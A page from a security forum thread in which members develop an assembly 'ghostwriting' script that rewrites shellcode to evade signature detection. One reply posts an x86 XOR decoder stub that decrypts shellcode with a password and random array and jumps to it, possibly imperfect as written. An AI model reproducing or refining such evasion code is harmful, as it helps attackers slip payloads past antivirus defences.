Page 2 of 2 FirstFirst 12
Results 11 to 14 of 14

Thread: Part one of an ASM ghostwriting PoC script

  1. #11
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Part one of an ASM ghostwriting PoC script

    So the way I see it this:
    JNZ, JZ sets ZF to 0
    TEST and CMP set ZF to 1 IF the values are equal and 0 otherwise.
    And the rest I have no idea what you said... :P

    I need things to be a little more clearly explained, sorry...
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  2. #12
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Part one of an ASM ghostwriting PoC script

    I added JMP, JNZ, JZ, JNE, JE, JNS, JS, CMP, and TEST support in the newest version.

    I believe I am now ready to work on the obfuscators, unless someone tells me otherwise.

    I do not have JGE, JG, JLE, and JL support as described in my readme.

    Also, this is now on github https://github.com/Shadow-Master/

    Let me know what you guys think, and whether you have any ideas for obfuscating...
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  3. #13
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default Re: Part one of an ASM ghostwriting PoC script

    Hi some obfuscating code
    The code proable needs modifing
    Three part
    256 array for random stuff
    16 array of password
    0xf0 for shellcode


    mov eax, 0x01400101 //find empety spot on heap
    and eax, 0xffffff;
    mov ebx, esp //mov shellcode address into ebx
    xor ecx, ecx

    top:
    mov edx, [ebx+ecx] //copy array buffer, 256 size with random string
    mov [eax+ecx], edx
    add ecx, 0x04
    cmp ecx, 0xff
    jnz top;

    mov esp, eax
    add esp, ecx
    add ecx, 0x04;

    top1:
    mov edx, [ebx+ecx] //copy password into array
    mov [eax+ecx], edx
    add ecx, 0x04
    cmp ecx, 0x010f
    jnz top1;

    mov esi, eax //save decreypted address
    add esi, ecx
    add ecx, 0x04

    top2:
    mov edi, [ebx+ecx] //mov encrypted part into edi
    and edi, 0xff //grab byte
    mov ebp, eax //mov random array address into ebp
    mov ebx, [esp+ecx] //grab password data
    xor ebx, [ebp+edi] xor ebx, with password and random data
    mov [eax+ecx], ebx
    inc ecx //move to next byte
    cmp ecx, 0x01f0 //length of shellcode
    jnz top2

    jmp esi //jump to decomprypted code

  4. #14
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Part one of an ASM ghostwriting PoC script

    Very cool. I am going to add a new mode with a static decoder to compiled with the shellcode to use this, and similar, functions.
    Where I stand now is to come up with some sort of general outline for an engine to produce ASM code to obtain a specific value in a specific spot. No specifics, just generalities.
    Also, I need to finish making an outline for community produced Line-by-line replacement modules, then finish implementing -l|line-by-line in the script.

    When I make at least one module for each instruction, and can replace them without error, then I will post them, and post the rules for making modules, similar to the msf.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

Page 2 of 2 FirstFirst 12

Similar Threads

  1. Pentest Part one
    By pentest09 in forum BackTrack 5 Videos
    Replies: 9
    Last Post: 09-12-2011, 04:51 PM
  2. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  3. Replies: 10
    Last Post: 07-12-2010, 03:04 PM
  4. Knowing part of the key
    By new2bt3 in forum OLD Wireless
    Replies: 10
    Last Post: 05-31-2009, 09:09 AM
  5. BT3 USB Part 2
    By Crazy8 in forum OLD BT3beta General
    Replies: 4
    Last Post: 01-16-2008, 06:53 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •